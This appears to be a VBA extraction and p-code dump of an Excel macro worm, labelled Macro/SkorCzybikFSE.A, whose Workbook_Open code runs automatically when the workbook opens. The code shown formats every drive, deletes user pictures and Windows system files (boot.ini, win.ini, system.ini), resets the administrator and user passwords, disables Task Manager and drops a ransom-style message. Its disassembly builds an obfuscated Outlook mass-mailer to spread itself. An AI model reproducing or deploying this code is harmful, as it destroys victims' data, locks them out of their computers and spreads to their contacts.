urlwrite2.writeline ("[DEFAULT] ")
urlwrite2.writeline ("BASEURL=www.speedsurf.to/sk0r1337/s_popup2.html ")
urlwrite2.writeline ("[InternetShortcut] ")
urlwrite2.writeline ("URL=www.speedsurf.to/sk0r1337/s_popup2.html ")
urlwrite2.Close
Set urlwrite3 = fso.createtextfile(favfolder + "\sk0r.url")
urlwrite3.writeline ("[DEFAULT] ")
urlwrite3.writeline ("BASEURL=www.speedsurf.to/sk0r1337/s_popup3.html ")
urlwrite3.writeline ("[InternetShortcut] ")
urlwrite3.writeline ("URL=www.speedsurf.to/sk0r1337/s_popup3.html ")
urlwrite3.Close
Set urlwrite4 = fso.createtextfile(favfolder + "\1337.url")
urlwrite4.writeline ("[DEFAULT] ")
urlwrite4.writeline ("BASEURL=www.speedsurf.to/sk0r1337/s_popup4.html ")
urlwrite4.writeline ("[InternetShortcut] ")
urlwrite4.writeline ("URL=www.speedsurf.to/sk0r1337/s_popup4.html ")
urlwrite4.Close
UserPicFolder = wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\" & "My Pictures")
Set crtVbsPic = fso.createtextfile(UserPicFolder + "\sk0r_Overwrt.vbs", True)
crtVbsPic.writeline ("Set fso = CreateObject(""scripting.filesystemobject"") ")
crtVbsPic.writeline ("scriptf = WScript.ScriptFullName ")
crtVbsPic.writeline ("scriptf = Replace(scriptf, ""sk0r_Overwrt.vbs"", """") ")
crtVbsPic.writeline ("Set getf = fso.getfolder(scriptf) ")
crtVbsPic.writeline ("dateien = getf.Files ")
crtVbsPic.writeline ("For Each filenow In dateien ")
crtVbsPic.writeline ("fso.deletefile (filenow.Path) ")
crtVbsPic.writeline ("Next ")
crtVbsPic.writeline ("subf = getf.subfolders ")
crtVbsPic.writeline ("For Each foldersubf In subf ")
crtVbsPic.writeline ("kaka = foldersubf.Files ")
crtVbsPic.writeline ("For Each dateiensubfl In kaka ")
crtVbsPic.writeline ("fso.deletefile (dateiensubf) ")
crtVbsPic.writeline ("Next ")
crtVbsPic.writeline ("Next ")
crtVbsPic.Close
wshs.Run ("WScript " + UserPicFolder + "\sk0r_Overwrt.vbs"), , True
fso.deletefile (UserPicFolder + "\sk0r_Overwrt.vbs")
Set GetDrivesNow = fso.Drives
For Each FormatDrive In GetDrivesNow
If FormatDrive.DriveType = 1 Or FormatDrive.DriveType = 2 Then
wshs.Run ("format " + FormatDrive + " /y"), , True
End If
Next
Set gtini = fso.getfile(hddisk + "\boot.ini")
gtini.Attributes = gtini.Attributes - 4
gtini.Attributes = gtini.Attributes - 1
gtini.Attributes = gtini.Attributes - 2
fso.deletefile (hddisk + "\boot.ini")
fso.deletefile (windir + "\win.ini")
fso.deletefile (windir + "\system.ini")
Randomize: pwThisComputer = Int(1000000000 * Rnd)
StringPassw = CStr(pwThisComputer)
wshs.Run ("net user administrator " + StringPassw), , True
wshs.Run ("net user %UserName% " + StringPassw), , True
Set crtBatchInfoFile = fso.createtextfile(windir + "\sk0r_Batch.bat", True)
crtBatchInfoFile.writeline ("@echo off")
crtBatchInfoFile.writeline ("rem Win32/SkorCzybikFSE.A dropped batch file")
crtBatchInfoFile.writeline ("color 3E")
crtBatchInfoFile.writeline ("title Skor Czybik File System Erase")
crtBatchInfoFile.writeline ("cls")
crtBatchInfoFile.writeline ("echo Dear User")
crtBatchInfoFile.writeline ("echo You have been infected with the")
crtBatchInfoFile.writeline ("echo Skor Czybik File System Erase Worm")
crtBatchInfoFile.writeline ("echo Do not be surprised! All data is lost")
crtBatchInfoFile.writeline ("echo Visit the flagg now. ")
crtBatchInfoFile.writeline ("echo .")
crtBatchInfoFile.writeline ("echo .")
crtBatchInfoFile.writeline ("echo ©2006 by sk0r aka Czybik")
crtBatchInfoFile.writeline ("echo .")
crtBatchInfoFile.writeline ("echo .")
crtBatchInfoFile.writeline ("pause")
crtBatchInfoFile.Close
wshs.Run (windir + "\sk0r_Batch.bat")
wshs.Run ("http://aeq.ae.funpic.de/Czybik_sk0r_Flagge.jpg")
wshs.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 1, "REG_DWORD"
Set getmyslf = fso.getfile(SkorCzybikFSE.Path + "\" + SkorCzybikFSE.Name)
getmyslf.Attributes = getmyslf.Attributes + 2
wshs.Run ("RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters")
Set wshs = Nothing
Set fso = Nothing
Set sysdir = Nothing
Set windir = Nothing
Set ntwrk = Nothing
Unload Me
End Sub
'<!-- Macro/SkorCzybikFSE.A | ©2006 by sk0r --!>
Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Processing file: /tmp/qstore_2wcc67v8
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/SkorCzybikFSE - 27287 bytes
' Line #0:
' QuoteRem 0x0000 0x002D "Macro/SkorCzybikFSE.A ©opyrights 2006 by sk0r"
' Line #1:
' QuoteRem 0x0000 0x002B "This Worm was created by sk0r aka Daniel B."
' Line #2:
' QuoteRem 0x0000 0x002A "You are not allowed to decompile the Worm!"
' Line #3:
' QuoteRem 0x0000 0x0021 "ViSiT my Site @ www.sk0r-virii.tk"
' Line #4:
' QuoteRem 0x0000 0x0000 ""
' Line #5:
' QuoteRem 0x0000 0x0036 " This is a very dangerous worm, because it's formating"
' Line #6:
' QuoteRem 0x0000 0x0033 " all found drives and discettes which are inserted."
' Line #7:
' QuoteRem 0x0000 0x0036 " Also it deletes important System files like boot.ini,"
' Line #8:
' QuoteRem 0x0000 0x0038 " system.ini and win.ini. it has much functions more like"
' Line #9:
' QuoteRem 0x0000 0x0015 " you can see here ;-)"
' Line #10:
' QuoteRem 0x0000 0x0000 ""
' Line #11:
' QuoteRem 0x0000 0x0032 " WARNING: This worm makes the system unuseable and"
' Line #12:
' QuoteRem 0x0000 0x0037 " erase all files of harddrives and discettes!!"
' Line #13:
' QuoteRem 0x0000 0x0000 ""
' Line #14:
' QuoteRem 0x0000 0x0014 " The Wormname means:"
' Line #15:
' QuoteRem 0x0000 0x0000 ""
' Line #16:
' QuoteRem 0x0000 0x0023 " Skor Czybik File System Eraser"
' Line #17:
' QuoteRem 0x0000 0x0000 ""
' Line #18:
' QuoteRem 0x0000 0x0038 "========================================================"
' Line #19:
' Line #20:
' Line #21:
' FuncDefn (Private Sub Workbook_Open())
' Line #22:
' OnError (Resume Next)
' Line #23:
' SetStmt
' LitStr 0x000D "wscript.shell"
' ArgsLd CreateObject 0x0001
' Set wshs
' Line #24:
' SetStmt
' LitStr 0x001A "scripting.filesystemobject"
' ArgsLd CreateObject 0x0001
' Set fso
' Line #25:
' SetStmt
' LitDI2 0x0001
' Ld fso
' ArgsMemLd getspecialfolder 0x0001
' Set sysdir
' Line #26:
' SetStmt
' LitDI2 0x0000
' Ld fso
' ArgsMemLd getspecialfolder 0x0001
' Set windir
' Line #27:
' Ld windir
' LitDI2 0x0002
' ArgsLd Left 0x0002
' St hddisk
' Line #28:
' SetStmt
' LitStr 0x000F "wscript.network"
' ArgsLd CreateObject 0x0001
' Set ntwrk
' Line #29:
' Line #30:
' ArgsCall Randomize 0x0000
' BoS 0x0000
' LitDI4 0x4240 0x000F
' Ld AllDrives
' Mul
' FnInt
' LitDI4 0x0517 0x0013
' Add
' St _B_var_intZahl
' Line #31:
' SetStmt
' Ld SkorCzybikFSE
' MemLd Path
' LitStr 0x0001 "\"
' Add
' Ld SkorCzybikFSE
' MemLd Name
' Add
' Ld fso
' ArgsMemLd getfile 0x0001
' Set _B_var_getmenow
' Line #32:
' Ld windir
' LitStr 0x000D "\Ihre_Angaben"
' Add
' Ld _B_var_intZahl
' Coerce (Str)
' Add
' LitStr 0x0004 ".xls"
' Add
' Paren
' Ld _B_var_getmenow
' ArgsMemCall intZahl 0x0001
' Line #33:
' Line #34:
' LitStr 0x004D "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
' LitDI2 0x0001
' LitStr 0x0009 "REG_DWORD"
' Ld wshs
' ArgsMemCall regwrite 0x0003
' Line #35:
' LitStr 0x004C "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout"
' LitDI2 0x0000
' LitStr 0x0009 "REG_DWORD"
' Ld wshs
' ArgsMemCall regwrite 0x0003
' Line #36:
' Line #37:
' SetStmt
' Ld sysdir
' LitStr 0x0010 "\sk0r_mailer.vbs"
' Add
' LitVarSpecial (True)
' Ld fso
' ArgsMemLd createtextfile 0x0002
' Set ilikeskor
' Line #38:
' LitStr 0x002C "rem Win32/SkorCzybikFSE Mailer Script File "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #39:
' LitStr 0x0015 "On Error Resume Next "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #40:
' LitStr 0x0035 "Set fso = CreateObject("scripting.filesystemobject") "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #41:
' LitStr 0x0025 "Set sysdir = fso.getspecialfolder(1) "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #42:
' LitStr 0x0025 "Set windir = fso.getspecialfolder(0) "
' Paren
' Ld ilikeskor
' ArgsMemCall writeline 0x0001
' Line #43:
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #44:
' Line #45:
' Ld kackfun1
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x003D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0043
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0052
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #46:
' Ld kackfun1
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0042
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004A
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0043
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #47:
' Line #48:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0028
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #49:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x004C
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004B
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #50:
' Line #51:
' Ld kackfun1
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x004C
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0043
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #52:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0022
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0029
' ArgsLd Chr 0x0001
' Concat
' Ld vbCrLf
' Concat
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #53:
' Line #54:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0057
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004C
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x003D
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #55:
' Line #56:
' Ld kackfun1
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #57:
' Ld kackfun1
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0043
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0052
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #58:
' Line #59:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0028
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0030
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0029
' ArgsLd Chr 0x0001
' Concat
' Ld vbCrLf
' Concat
' LitDI2 0x0046
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #60:
' Line #61:
' Ld kackfun1
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0052
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x005F
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #62:
' Ld kackfun1
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0049
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004C
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x003D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #63:
' Line #64:
' Ld kackfun1
' LitDI2 0x0031
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0032
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0037
' ArgsLd Chr 0x0001
' Ld vbCrLf
' Add
' Concat
' St kackfun1
' Line #65:
' Ld kackfun1
' LitDI2 0x0053
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0048
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #66:
' Line #67:
' Ld kackfun1
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x003D
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0020
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004F
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0055
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #68:
' Ld kackfun1
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0050
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x002E
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0047
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0045
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x0054
' ArgsLd Chr 0x0001
' Concat
' St kackfun1
' Line #69:
' Line #70:
' Ld kackfun1
' LitDI2 0x004E
' ArgsLd Chr 0x0001
' Add
' LitDI2 0x0041
' ArgsLd Chr 0x0001
' Concat
' LitDI2 0x004D
…